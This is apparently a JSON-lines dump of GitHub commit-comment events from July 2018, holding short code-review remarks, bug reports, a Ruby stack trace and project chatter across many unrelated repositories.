{"id":"7952151531","type":"CommitCommentEvent","actor":{"login":"DracoZ12"},"repo":{"name":"OpenShopChannel/ShopChannel"},"payload":{"comment":{"id":29675881,"position":null,"line":null,"path":null,"commit_id":"758d23baee683aa5fb9192978d9721b8989999bb","created_at":"2018-07-11T19:33:00Z","updated_at":"2018-07-11T19:33:00Z","author_association":"NONE","body":"where's the .git directory"}},"created_at":"2018-07-11T19:33:00Z"}
{"id":"7952152346","type":"CommitCommentEvent","actor":{"login":"ciotlosm"},"repo":{"name":"custom-components/custom_cards"},"payload":{"comment":{"id":29675887,"position":66,"line":82,"path":"custom_components/custom_cards.py","commit_id":"59909c287e475ae4e7b722698dadc2449f11053b","created_at":"2018-07-11T19:33:11Z","updated_at":"2018-07-11T19:33:11Z","author_association":"NONE","body":"I'm not sure using sed is a good idea. I'd rather load the whole yaml and update the correct key based on path instead of doing string search & substrings."}},"created_at":"2018-07-11T19:33:11Z"}
{"id":"7952153554","type":"CommitCommentEvent","actor":{"login":"rschoenbeck"},"repo":{"name":"kiva/vertex"},"payload":{"comment":{"id":29675890,"position":null,"line":null,"path":null,"commit_id":"62fb8010d6a1509e775bb561e5c5a3bca168fc45","created_at":"2018-07-11T19:33:27Z","updated_at":"2018-07-11T19:33:27Z","author_association":"CONTRIBUTOR","body":"@vanmh Feels like this is probably out of date now?"}},"created_at":"2018-07-11T19:33:27Z"}
{"id":"7952155411","type":"CommitCommentEvent","actor":{"login":"Nadahar"},"repo":{"name":"DigitalMediaServer/DigitalMediaServer"},"payload":{"comment":{"id":29675893,"position":59,"line":1213,"path":"pom.xml","commit_id":"7e3b76fb02921aefad60968044e139eced036037","created_at":"2018-07-11T19:33:52Z","updated_at":"2018-07-11T19:33:52Z","author_association":"CONTRIBUTOR","body":"@Sami32 I agree, but I don't think that is possible for \"sub configurations\". I might be able to hack something though, but I'm not sure I should. It will make the configuration more confusing."}},"created_at":"2018-07-11T19:33:52Z"}
{"id":"7952163290","type":"CommitCommentEvent","actor":{"login":"btalbot"},"repo":{"name":"afair/email_address"},"payload":{"comment":{"id":29675899,"position":null,"line":null,"path":null,"commit_id":"7226b3f24630404e5f71841336e9242d3b783992","created_at":"2018-07-11T19:35:38Z","updated_at":"2018-07-11T19:35:38Z","author_association":"NONE","body":"This commit breaks the main use case of the gem since `blank?` is not defined.\r\n\r\n```\r\nirb(main):008:0> EmailAddress::VERSION\r\n=> \"0.1.10\"\r\nirb(main):009:0> EmailAddress.valid? \"allen@google.com\"\r\nNoMethodError: undefined method `blank?' for #<EmailAddress::Exchanger:0x00007f9118b3c350>\r\n\tfrom /Users/btalbot/.rbenv/versions/2.4.3/lib/ruby/gems/2.4.0/gems/email_address-0.1.10/lib/email_address/host.rb:415:in `valid_mx?'\r\n\tfrom /Users/btalbot/.rbenv/versions/2.4.3/lib/ruby/gems/2.4.0/gems/email_address-0.1.10/lib/email_address/host.rb:396:in `valid?'\r\n\tfrom /Users/btalbot/.rbenv/versions/2.4.3/lib/ruby/gems/2.4.0/gems/email_address-0.1.10/lib/email_address/address.rb:236:in `valid?'\r\n\tfrom /Users/btalbot/.rbenv/versions/2.4.3/lib/ruby/gems/2.4.0/gems/email_address-0.1.10/lib/email_address.rb:46:in `public_send'\r\n\tfrom /Users/btalbot/.rbenv/versions/2.4.3/lib/ruby/gems/2.4.0/gems/email_address-0.1.10/lib/email_address.rb:46:in `block (2 levels) in singleton class'\r\n\tfrom (irb):9\r\n\tfrom /Users/btalbot/.rbenv/versions/2.4.3/lib/ruby/gems/2.4.0/gems/bundler-1.15.4/lib/bundler/cli/console.rb:18:in `run'\r\n\tfrom /Users/btalbot/.rbenv/versions/2.4.3/lib/ruby/gems/2.4.0/gems/bundler-1.15.4/lib/bundler/cli.rb:393:in `console'\r\n\tfrom /Users/btalbot/.rbenv/versions/2.4.3/lib/ruby/gems/2.4.0/gems/bundler-1.15.4/lib/bundler/vendor/thor/lib/thor/command.rb:27:in `run'\r\n\tfrom /Users/btalbot/.rbenv/versions/2.4.3/lib/ruby/gems/2.4.0/gems/bundler-1.15.4/lib/bundler/vendor/thor/lib/thor/invocation.rb:126:in `invoke_command'\r\n\tfrom /Users/btalbot/.rbenv/versions/2.4.3/lib/ruby/gems/2.4.0/gems/bundler-1.15.4/lib/bundler/vendor/thor/lib/thor.rb:387:in `dispatch'\r\n\tfrom /Users/btalbot/.rbenv/versions/2.4.3/lib/ruby/gems/2.4.0/gems/bundler-1.15.4/lib/bundler/cli.rb:22:in `dispatch'\r\n\tfrom /Users/btalbot/.rbenv/versions/2.4.3/lib/ruby/gems/2.4.0/gems/bundler-1.15.4/lib/bundler/vendor/thor/lib/thor/base.rb:466:in `start'\r\n\tfrom /Users/btalbot/.rbenv/versions/2.4.3/lib/ruby/gems/2.4.0/gems/bundler-1.15.4/lib/bundler/cli.rb:13:in `start'\r\n\tfrom /Users/btalbot/.rbenv/versions/2.4.3/lib/ruby/gems/2.4.0/gems/bundler-1.15.4/exe/bundle:30:in `block in <top (required)>'\r\n\tfrom /Users/btalbot/.rbenv/versions/2.4.3/lib/ruby/gems/2.4.0/gems/bundler-1.15.4/lib/bundler/friendly_errors.rb:121:in `with_friendly_errors'\r\n\tfrom /Users/btalbot/.rbenv/versions/2.4.3/lib/ruby/gems/2.4.0/gems/bundler-1.15.4/exe/bundle:22:in `<top (required)>'\r\n\tfrom /Users/btalbot/.rbenv/versions/2.4.3/bin/bundle:23:in `load'\r\n\tfrom /Users/btalbot/.rbenv/versions/2.4.3/bin/bundle:23:in `<main>'\r\n```\r\n"}},"created_at":"2018-07-11T19:35:38Z"}
{"id":"7952163778","type":"CommitCommentEvent","actor":{"login":"brycelelbach"},"repo":{"name":"brycelelbach/executors"},"payload":{"comment":{"id":29675900,"position":25,"line":186,"path":"wording.md","commit_id":"68e5280238862de0bffde2209f3fa71a6026d2aa","created_at":"2018-07-11T19:35:43Z","updated_at":"2018-07-11T19:35:43Z","author_association":"OWNER","body":"Yep, making that change.\n\nOn Wed, Jul 11, 2018 at 11:41 AM, LeeHowes <notifications@github.com> wrote:\n\n> We would strongly argue that:\n> \"Both r.value(val) and r.except(e) are well-formed.\"\n>\n> is necessary here.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/brycelelbach/executors/commit/68e5280238862de0bffde2209f3fa71a6026d2aa#commitcomment-29675310>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAYTcvEJBny4yc63F8FpD6l8pC8z7RRMks5uFkbNgaJpZM4VLpWK>\n> .\n>\n\n\n\n-- \nBryce Adelstein Lelbach aka wash\nISO C++ Committee Member\nHPX and Thrust Developer\nCUDA Convert and Reformed AVX Junkie\n--\n"}},"created_at":"2018-07-11T19:35:43Z"}
{"id":"7952164449","type":"CommitCommentEvent","actor":{"login":"vilmara"},"repo":{"name":"tensorflow/benchmarks"},"payload":{"comment":{"id":29675901,"position":null,"line":null,"path":null,"commit_id":"9815f5f84fd5e681bbffdfe3176272a5c4ff5621","created_at":"2018-07-11T19:35:53Z","updated_at":"2018-07-11T19:35:53Z","author_association":"NONE","body":"@yuefengz I am running the tensorflow benchmarks but getting the error TypeError: function_buffering_resource() missing 1 required positional argument: 'output_types' when running the test with imagenet dataset. @reedwm recommended me using an older version of tf_cnn_benchmarks, like this commit 9815f5f. But I don't know how to do it?, should I update the flags.py file replacing this block of code or should I clone the entire benchmarks code from an older version like cnn_tf_v1.5_compatible"}},"created_at":"2018-07-11T19:35:53Z"}
{"id":"7952168204","type":"CommitCommentEvent","actor":{"login":"itaraju"},"repo":{"name":"itaraju/dotfiles"},"payload":{"comment":{"id":29675908,"position":null,"line":null,"path":null,"commit_id":"b4e733304d6e6e17b59b80651879069bdfa0fa1a","created_at":"2018-07-11T19:36:41Z","updated_at":"2018-07-11T19:36:41Z","author_association":"OWNER","body":"That looks like a great idea I'll try it out. I was also getting annoyed by the use of ;; and swaping , : will prevent this.\r\nThanks for sharing"}},"created_at":"2018-07-11T19:36:41Z"}
{"id":"7952169114","type":"CommitCommentEvent","actor":{"login":"dpocock"},"repo":{"name":"Dejzi/omnidial"},"payload":{"comment":{"id":29675909,"position":9,"line":61,"path":"core/src/test/java/org/omnidial/harvest/TelCandidateHarvesterTest.java","commit_id":"02aa717545c5dce6e596b4db76aeb31996226ea1","created_at":"2018-07-11T19:36:51Z","updated_at":"2018-07-11T19:36:51Z","author_association":"NONE","body":"need to add a couple more lines of code to run the harvester object"}},"created_at":"2018-07-11T19:36:51Z"}
{"id":"7952171828","type":"CommitCommentEvent","actor":{"login":"alamusi"},"repo":{"name":"EOS9Cat/documentation"},"payload":{"comment":{"id":29675914,"position":5,"line":5,"path":"Reason and Solution for 'the database dirty flag set' and Snapshot Backup&Restore/Reason and Solution for 'database dirty flag' and Snapshot Backup&Restore.md","commit_id":"d798c9f89a05e2a35017a97b782fd1b110aebb66","created_at":"2018-07-11T19:37:26Z","updated_at":"2018-07-11T19:37:26Z","author_association":"NONE","body":"Most of the EOS node infrastructures in the community are built on top of docker. So do we. One of the most common and challenging error is `database dirty flag set` when the node instance shuts down. This leads to the node unable to restart properly from the previous point due to the broken data integrity."}},"created_at":"2018-07-11T19:37:26Z"}
{"id":"7952174827","type":"CommitCommentEvent","actor":{"login":"atallahade"},"repo":{"name":"xwiki/xwiki-platform"},"payload":{"comment":{"id":29675920,"position":null,"line":null,"path":null,"commit_id":"723d68366dcd966ea70db80c3f16c18ff13e72af","created_at":"2018-07-11T19:38:06Z","updated_at":"2018-07-11T19:38:06Z","author_association":"CONTRIBUTOR","body":"Nice commit, I'll close #754."}},"created_at":"2018-07-11T19:38:06Z"}
{"id":"7952178760","type":"CommitCommentEvent","actor":{"login":"staabm"},"repo":{"name":"redaxo/redaxo"},"payload":{"comment":{"id":29675926,"position":54,"line":240,"path":"redaxo/src/core/lib/autoload.php","commit_id":"5ab7b462c1f47515a3739d29e568647179766a00","created_at":"2018-07-11T19:38:55Z","updated_at":"2018-07-11T19:38:55Z","author_association":"MEMBER","body":"Wozu brauchen wir hier den RecursiveIteratorIterator?"}},"created_at":"2018-07-11T19:38:55Z"}
{"id":"7952179633","type":"CommitCommentEvent","actor":{"login":"nalbj"},"repo":{"name":"nalbj/Agility2018IQaccess"},"payload":{"comment":{"id":29675927,"position":null,"line":null,"path":null,"commit_id":"f4db41183341d9c8eb38710494e4a4458b346dca","created_at":"2018-07-11T19:39:08Z","updated_at":"2018-07-11T19:39:08Z","author_association":"OWNER","body":"renamed"}},"created_at":"2018-07-11T19:39:08Z"}
{"id":"7952179891","type":"CommitCommentEvent","actor":{"login":"padmassun"},"repo":{"name":"NREL/OpenStudio-server"},"payload":{"comment":{"id":29675928,"position":null,"line":null,"path":null,"commit_id":"57ad2ee603e761f00474887c1bba4c186706f9bc","created_at":"2018-07-11T19:39:11Z","updated_at":"2018-07-11T19:39:11Z","author_association":"MEMBER","body":"https://github.com/canmet-energy/btap_tasks/issues/110"}},"created_at":"2018-07-11T19:39:11Z"}
{"id":"7952179958","type":"CommitCommentEvent","actor":{"login":"Slydk1982"},"repo":{"name":"Fishbiter/gz3doom"},"payload":{"comment":{"id":29675929,"position":null,"line":null,"path":null,"commit_id":"044472e9b580bac93a5adcbea0203d1dc0b9b259","created_at":"2018-07-11T19:39:12Z","updated_at":"2018-07-11T19:39:12Z","author_association":"NONE","body":"This is cool :) Just tried this one out. It works with nearly every mod. But I encountered a bug. If i play with any mod like Brutal Doom, Project Brutality or Brutal Wolfenstein, when i die the game crashes."}},"created_at":"2018-07-11T19:39:12Z"}
{"id":"7952180564","type":"CommitCommentEvent","actor":{"login":"padmassun"},"repo":{"name":"NREL/OpenStudio-server"},"payload":{"comment":{"id":29675932,"position":null,"line":null,"path":null,"commit_id":"8ac4c8cca19525d1190c604ce8b79a1a039d29ff","created_at":"2018-07-11T19:39:19Z","updated_at":"2018-07-11T19:39:19Z","author_association":"MEMBER","body":"https://github.com/canmet-energy/btap_tasks/issues/110"}},"created_at":"2018-07-11T19:39:19Z"}
{"id":"7952180693","type":"CommitCommentEvent","actor":{"login":"nalbj"},"repo":{"name":"nalbj/Agility2018IQaccess"},"payload":{"comment":{"id":29675933,"position":null,"line":null,"path":null,"commit_id":"f4db41183341d9c8eb38710494e4a4458b346dca","created_at":"2018-07-11T19:39:20Z","updated_at":"2018-07-11T19:39:20Z","author_association":"OWNER","body":"renamed"}},"created_at":"2018-07-11T19:39:20Z"}
{"id":"7952181009","type":"CommitCommentEvent","actor":{"login":"padmassun"},"repo":{"name":"NREL/OpenStudio-server"},"payload":{"comment":{"id":29675934,"position":null,"line":null,"path":null,"commit_id":"e4bec9d889fc92eb315bc8113b1241ed851ffae9","created_at":"2018-07-11T19:39:24Z","updated_at":"2018-07-11T19:39:24Z","author_association":"MEMBER","body":"https://github.com/canmet-energy/btap_tasks/issues/110"}},"created_at":"2018-07-11T19:39:24Z"}
{"id":"7952181537","type":"CommitCommentEvent","actor":{"login":"padmassun"},"repo":{"name":"NREL/OpenStudio-server"},"payload":{"comment":{"id":29675936,"position":null,"line":null,"path":null,"commit_id":"4d16cf0e9d3817ca5fde7eec7a11bf6e1ad6edae","created_at":"2018-07-11T19:39:30Z","updated_at":"2018-07-11T19:39:30Z","author_association":"MEMBER","body":"https://github.com/canmet-energy/btap_tasks/issues/110"}},"created_at":"2018-07-11T19:39:30Z"}
{"id":"7952181871","type":"CommitCommentEvent","actor":{"login":"padmassun"},"repo":{"name":"NREL/OpenStudio-server"},"payload":{"comment":{"id":29675938,"position":null,"line":null,"path":null,"commit_id":"6452610b112f3060a499544700f194ee2d75a261","created_at":"2018-07-11T19:39:35Z","updated_at":"2018-07-11T19:39:35Z","author_association":"MEMBER","body":"https://github.com/canmet-energy/btap_tasks/issues/110"}},"created_at":"2018-07-11T19:39:35Z"}
{"id":"7952182197","type":"CommitCommentEvent","actor":{"login":"padmassun"},"repo":{"name":"NREL/OpenStudio-server"},"payload":{"comment":{"id":29675939,"position":null,"line":null,"path":null,"commit_id":"729aa3a78c2d2481074e52915998478eadfb3a46","created_at":"2018-07-11T19:39:39Z","updated_at":"2018-07-11T19:39:39Z","author_association":"MEMBER","body":"https://github.com/canmet-energy/btap_tasks/issues/110"}},"created_at":"2018-07-11T19:39:39Z"}
{"id":"7952182518","type":"CommitCommentEvent","actor":{"login":"padmassun"},"repo":{"name":"NREL/OpenStudio-server"},"payload":{"comment":{"id":29675941,"position":null,"line":null,"path":null,"commit_id":"87c4f31853b46064bfd64d2d22d2ba5e3a1f95a3","created_at":"2018-07-11T19:39:44Z","updated_at":"2018-07-11T19:39:44Z","author_association":"MEMBER","body":"https://github.com/canmet-energy/btap_tasks/issues/110"}},"created_at":"2018-07-11T19:39:44Z"}
{"id":"7952182811","type":"CommitCommentEvent","actor":{"login":"yaleon24"},"repo":{"name":"yaleon24/Histogram"},"payload":{"comment":{"id":29675942,"position":null,"line":null,"path":null,"commit_id":"e4fa7a5a8b151a7b0901d18893f662738338eaab","created_at":"2018-07-11T19:39:48Z","updated_at":"2018-07-11T19:39:48Z","author_association":"OWNER","body":"Design and implement a program that creates a histogram that allows you to visually inspect the frequency distribution of a set of values.  The program should read in an arbitrary number of integers that are in the range 1 to 100 inclusive; then produce a chart similar to the one below that indicates how many input values fell in the range 1 to 10, 11 to 20, 21 to 30, and so on.  Print one asterisk for each value entered.\r\n\r\n\r\n\r\nIn the above histogram three entries have been made for 11-20 numbers and one for a number in between 81-90.\r\n\r\nUse the following:\r\n\r\nSystem.out.print(\"1- 10\\t |\");\r\n\r\n...\r\n\r\nSystem.out.print(\"91-100\\t |\");\r\n\r\nDo not change anything in the main method.  \r\n\r\nThe program will terminate if a number that's too small or too large is entered.\r\n\r\n"}},"created_at":"2018-07-11T19:39:48Z"}
{"id":"7952182843","type":"CommitCommentEvent","actor":{"login":"padmassun"},"repo":{"name":"NREL/OpenStudio-server"},"payload":{"comment":{"id":29675943,"position":null,"line":null,"path":null,"commit_id":"af73d1197e310838d5d74a7719600b0536a6dd55","created_at":"2018-07-11T19:39:48Z","updated_at":"2018-07-11T19:39:48Z","author_association":"MEMBER","body":"https://github.com/canmet-energy/btap_tasks/issues/110"}},"created_at":"2018-07-11T19:39:48Z"}
{"id":"7952183123","type":"CommitCommentEvent","actor":{"login":"padmassun"},"repo":{"name":"NREL/OpenStudio-server"},"payload":{"comment":{"id":29675944,"position":null,"line":null,"path":null,"commit_id":"bef391d2e9ceeade0948d4e6d9fc772903a58960","created_at":"2018-07-11T19:39:52Z","updated_at":"2018-07-11T19:39:52Z","author_association":"MEMBER","body":"https://github.com/canmet-energy/btap_tasks/issues/110"}},"created_at":"2018-07-11T19:39:52Z"}
{"id":"7952183545","type":"CommitCommentEvent","actor":{"login":"padmassun"},"repo":{"name":"NREL/OpenStudio-server"},"payload":{"comment":{"id":29675946,"position":null,"line":null,"path":null,"commit_id":"65b36131653c4e9909dad5a8a69215e52ee13c75","created_at":"2018-07-11T19:39:57Z","updated_at":"2018-07-11T19:39:57Z","author_association":"MEMBER","body":"https://github.com/canmet-energy/btap_tasks/issues/110"}},"created_at":"2018-07-11T19:39:57Z"}
{"id":"7952183607","type":"CommitCommentEvent","actor":{"login":"alamusi"},"repo":{"name":"EOS9Cat/documentation"},"payload":{"comment":{"id":29675947,"position":null,"line":null,"path":null,"commit_id":"d798c9f89a05e2a35017a97b782fd1b110aebb66","created_at":"2018-07-11T19:39:58Z","updated_at":"2018-07-11T19:39:58Z","author_association":"NONE","body":"avoid using contraction in formal writing. i.e. couldn't -> could not, won't -> will not"}},"created_at":"2018-07-11T19:39:58Z"}
{"id":"7952183750","type":"CommitCommentEvent","actor":{"login":"Nebri"},"repo":{"name":"Nebri/deck"},"payload":{"comment":{"id":29675948,"position":4,"line":null,"path":"l10n/en_GB.js","commit_id":"ba378ea00b36f5a13ff20f0e869a65de153cf791","created_at":"2018-07-11T19:39:59Z","updated_at":"2018-07-11T19:39:59Z","author_association":"OWNER","body":"beautiful, will do!"}},"created_at":"2018-07-11T19:39:59Z"}
{"id":"7952184025","type":"CommitCommentEvent","actor":{"login":"padmassun"},"repo":{"name":"NREL/OpenStudio-server"},"payload":{"comment":{"id":29675949,"position":null,"line":null,"path":null,"commit_id":"d61dcbc8548d6366e176d64297db0912aa14a09a","created_at":"2018-07-11T19:40:03Z","updated_at":"2018-07-11T19:40:03Z","author_association":"MEMBER","body":"https://github.com/canmet-energy/btap_tasks/issues/110"}},"created_at":"2018-07-11T19:40:03Z"}
{"id":"7952185361","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29675951,"position":null,"line":null,"path":null,"commit_id":"a0d5676864e70e83c7067c4e6fed321aa071808b","created_at":"2018-07-11T19:40:20Z","updated_at":"2018-07-11T19:40:20Z","author_association":"OWNER","body":"Created multidev environment [dgreat#pr-dshblks2](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#pr-dshblks2).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-dshblks2-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-11T19:40:20Z"}
{"id":"7952186077","type":"CommitCommentEvent","actor":{"login":"grkopiec"},"repo":{"name":"nkopiec/JavaLearning"},"payload":{"comment":{"id":29675952,"position":2,"line":2,"path":"056Lambds/src/pl/java/IAgeChecker.java","commit_id":"1f0a65254549384be7a4ae8aa0b64fb8f6bca2c1","created_at":"2018-07-11T19:40:28Z","updated_at":"2018-07-11T19:40:28Z","author_association":"CONTRIBUTOR","body":"If i remember correctly each lambda interface should be properly annotated"}},"created_at":"2018-07-11T19:40:28Z"}
{"id":"7952189265","type":"CommitCommentEvent","actor":{"login":"lucagasparini"},"repo":{"name":"lucagasparini/webtop5"},"payload":{"comment":{"id":29675960,"position":null,"line":null,"path":null,"commit_id":"0e36e4ea8b6bfe999d7bf30805b0ec4387b0cb45","created_at":"2018-07-11T19:41:07Z","updated_at":"2018-07-11T19:41:07Z","author_association":"OWNER","body":"NethServer/dev#5516"}},"created_at":"2018-07-11T19:41:07Z"}
{"id":"7952190943","type":"CommitCommentEvent","actor":{"login":"gnarf"},"repo":{"name":"rschamp/scratch-gui"},"payload":{"comment":{"id":29675963,"position":null,"line":null,"path":null,"commit_id":"2b4ad1b2e8df8e3313a07e13a4be495ddd762be2","created_at":"2018-07-11T19:41:28Z","updated_at":"2018-07-11T19:41:28Z","author_association":"NONE","body":"<3"}},"created_at":"2018-07-11T19:41:28Z"}
{"id":"7952194227","type":"CommitCommentEvent","actor":{"login":"MNKCrypto"},"repo":{"name":"MNKCrypto/Splitter"},"payload":{"comment":{"id":29675970,"position":2,"line":31,"path":"contracts/Splitter.sol","commit_id":"34dd3f7dd81dfa91cd438b080bd2890c6aca9185","created_at":"2018-07-11T19:42:14Z","updated_at":"2018-07-11T19:42:14Z","author_association":"OWNER","body":"I missed removing it. Will update it"}},"created_at":"2018-07-11T19:42:14Z"}
{"id":"7952198017","type":"CommitCommentEvent","actor":{"login":"gastaldi"},"repo":{"name":"fabric8-launcher/demo-cloud-app-creator"},"payload":{"comment":{"id":29675977,"position":11,"line":14,"path":"src/pages/Create.js","commit_id":"2814def1692f32fbfc4220c4f0c25b96c045a9d5","created_at":"2018-07-11T19:43:03Z","updated_at":"2018-07-11T19:43:03Z","author_association":"CONTRIBUTOR","body":"I think in this case it would be better to have a separate `<DummyTemplateItem/>`?"}},"created_at":"2018-07-11T19:43:03Z"}
{"id":"7952199009","type":"CommitCommentEvent","actor":{"login":"nalbj"},"repo":{"name":"nalbj/Agility2018IQaccess"},"payload":{"comment":{"id":29675980,"position":null,"line":null,"path":null,"commit_id":"f4db41183341d9c8eb38710494e4a4458b346dca","created_at":"2018-07-11T19:43:17Z","updated_at":"2018-07-11T19:43:17Z","author_association":"OWNER","body":"jog"}},"created_at":"2018-07-11T19:43:17Z"}
{"id":"7952202764","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"zold-io/zold"},"payload":{"comment":{"id":29675990,"position":null,"line":null,"path":null,"commit_id":"9406401e7e48ae30e18550c258352456d5a533e3","created_at":"2018-07-11T19:44:04Z","updated_at":"2018-07-11T19:44:04Z","author_association":"COLLABORATOR","body":"Puzzle `384-9943eeb2` discovered in   [`bin/zold`](  https://github.com/zold-io/zold/blob/master/bin/zold)   and submitted as #385. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-11T19:44:04Z"}
{"id":"7952204702","type":"CommitCommentEvent","actor":{"login":"erokhins"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":29675993,"position":111,"line":225,"path":"compiler/frontend/src/org/jetbrains/kotlin/resolve/QualifiedExpressionResolver.kt","commit_id":"0e7cce1cc10562a12911d42ad1cc15ced536e7c6","created_at":"2018-07-11T19:44:28Z","updated_at":"2018-07-11T19:44:28Z","author_association":"MEMBER","body":"please refactor this somehow -- initialisation by when inside let after safe call... It is too painful for reading"}},"created_at":"2018-07-11T19:44:28Z"}
{"id":"7952207249","type":"CommitCommentEvent","actor":{"login":"elenapavel"},"repo":{"name":"meteor/simple-todos-react"},"payload":{"comment":{"id":29675994,"position":7,"line":4,"path":"client/main.js","commit_id":"4459f38b759d17ade45da61e67265fb48e6f39c5","created_at":"2018-07-11T19:45:02Z","updated_at":"2018-07-11T19:45:02Z","author_association":"NONE","body":"This import should not be removed otherwise, it throws an error: \"Target container is not a DOM element.\""}},"created_at":"2018-07-11T19:45:02Z"}
{"id":"7952213138","type":"CommitCommentEvent","actor":{"login":"Rideress"},"repo":{"name":"Rideress/JavaLearning"},"payload":{"comment":{"id":29676006,"position":13,"line":9,"path":"src/main/java/HelloWorld/HelloWorld.java","commit_id":"de20f7fd336b7e10cf3ad7361179f367cc905fc0","created_at":"2018-07-11T19:46:18Z","updated_at":"2018-07-11T19:46:18Z","author_association":"OWNER","body":"Я тогда не понимаю как это сделать, у меня получается есть класс MySystem, у которого есть стринговое поле myOut, для которого существует метод myPrintln(), в котором возвращается аргумент  \"Hello World\", если я правильно только что описал что должно выйти, то при данной реализации у меня возникает проблема с вызовом этого аргумента в main()."}},"created_at":"2018-07-11T19:46:18Z"}
{"id":"7952213494","type":"CommitCommentEvent","actor":{"login":"jtstorck"},"repo":{"name":"hortonworks/cloudbreak-documentation"},"payload":{"comment":{"id":29676008,"position":null,"line":null,"path":null,"commit_id":"5025e4ac8e238f3fcb699eebe27f94d2b8a315b8","created_at":"2018-07-11T19:46:22Z","updated_at":"2018-07-11T19:46:22Z","author_association":"NONE","body":"You might want to add that the user can modify the value of nifi-bootstrap-env's \"content\" property, but the java.io.tmpdir arg is required to be populated with a directory that does not have noexec set on it, and the nifi user must be able to write to that directory."}},"created_at":"2018-07-11T19:46:22Z"}
{"id":"7952214400","type":"CommitCommentEvent","actor":{"login":"blueprint-bot"},"repo":{"name":"palantir/blueprint"},"payload":{"comment":{"id":29676017,"position":null,"line":null,"path":null,"commit_id":"c727c84aed9f398d4ce4e3e7ea6dcee09f6c9985","created_at":"2018-07-11T19:46:34Z","updated_at":"2018-07-11T19:46:34Z","author_association":"COLLABORATOR","body":"<h3>Fix support for generic types in Tree component (#2629)</h3>\n\nPreview: <strong><a href='https://18379-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/docs-app/dist/index.html' target='_blank'>documentation</a> | <a href='https://18379-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/landing-app/dist/index.html' target='_blank'>landing</a> | <a href='https://18379-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/table-dev-app/dist/index.html' target='_blank'>table</a></strong>"}},"created_at":"2018-07-11T19:46:34Z"}
{"id":"7952214496","type":"CommitCommentEvent","actor":{"login":"ludeeus"},"repo":{"name":"custom-components/custom_cards"},"payload":{"comment":{"id":29676018,"position":62,"line":78,"path":"custom_components/custom_cards.py","commit_id":"59909c287e475ae4e7b722698dadc2449f11053b","created_at":"2018-07-11T19:46:35Z","updated_at":"2018-07-11T19:46:35Z","author_association":"CONTRIBUTOR","body":"Agreed"}},"created_at":"2018-07-11T19:46:35Z"}
{"id":"7952215372","type":"CommitCommentEvent","actor":{"login":"ludeeus"},"repo":{"name":"custom-components/custom_cards"},"payload":{"comment":{"id":29676019,"position":60,"line":76,"path":"custom_components/custom_cards.py","commit_id":"59909c287e475ae4e7b722698dadc2449f11053b","created_at":"2018-07-11T19:46:46Z","updated_at":"2018-07-11T19:46:46Z","author_association":"CONTRIBUTOR","body":"Agreed"}},"created_at":"2018-07-11T19:46:46Z"}
{"id":"7952216358","type":"CommitCommentEvent","actor":{"login":"alamusi"},"repo":{"name":"EOS9Cat/documentation"},"payload":{"comment":{"id":29676025,"position":26,"line":26,"path":"Reason and Solution for 'the database dirty flag set' and Snapshot Backup&Restore/Reason and Solution for 'database dirty flag' and Snapshot Backup&Restore.md","commit_id":"d798c9f89a05e2a35017a97b782fd1b110aebb66","created_at":"2018-07-11T19:46:59Z","updated_at":"2018-07-11T19:46:59Z","author_association":"NONE","body":"I don't quite understand this part. \r\n\r\n- using the same method (what same method?)\r\n- requires the human intervention (what intervention?)"}},"created_at":"2018-07-11T19:46:59Z"}
{"id":"7952216776","type":"CommitCommentEvent","actor":{"login":"lucagasparini"},"repo":{"name":"lucagasparini/webtop5-webdav"},"payload":{"comment":{"id":29676029,"position":null,"line":null,"path":null,"commit_id":"451b58a56f5f769398e1cb7f0347d992574444db","created_at":"2018-07-11T19:47:05Z","updated_at":"2018-07-11T19:47:05Z","author_association":"OWNER","body":"NethServer/dev#5516"}},"created_at":"2018-07-11T19:47:05Z"}
{"id":"7952216984","type":"CommitCommentEvent","actor":{"login":"grkopiec"},"repo":{"name":"nkopiec/JavaLearning"},"payload":{"comment":{"id":29676031,"position":5,"line":5,"path":"056Lambds/src/pl/java/Main.java","commit_id":"1f0a65254549384be7a4ae8aa0b64fb8f6bca2c1","created_at":"2018-07-11T19:47:08Z","updated_at":"2018-07-11T19:47:08Z","author_association":"CONTRIBUTOR","body":"This result is very pour it prints this text for all persons even if he has less than 20 years old"}},"created_at":"2018-07-11T19:47:08Z"}
{"id":"7952221090","type":"CommitCommentEvent","actor":{"login":"razorex"},"repo":{"name":"Kodi-vStream/venom-xbmc-addons"},"payload":{"comment":{"id":29676047,"position":null,"line":null,"path":null,"commit_id":"5a3794d705635d90e04262dd0346837e14eefc35","created_at":"2018-07-11T19:48:01Z","updated_at":"2018-07-11T19:48:01Z","author_association":"CONTRIBUTOR","body":"Le site ne fait plus d'ajout mais les sources reste dispo..."}},"created_at":"2018-07-11T19:48:01Z"}
{"id":"7952222830","type":"CommitCommentEvent","actor":{"login":"ludeeus"},"repo":{"name":"custom-components/custom_cards"},"payload":{"comment":{"id":29676052,"position":66,"line":82,"path":"custom_components/custom_cards.py","commit_id":"59909c287e475ae4e7b722698dadc2449f11053b","created_at":"2018-07-11T19:48:22Z","updated_at":"2018-07-11T19:48:22Z","author_association":"CONTRIBUTOR","body":"I tried that for hours... could not get i to wrok, it changed the structure of the whole file, which can be devestating for some users, this way is not the best, but it is safer than what I could come up with :)"}},"created_at":"2018-07-11T19:48:22Z"}
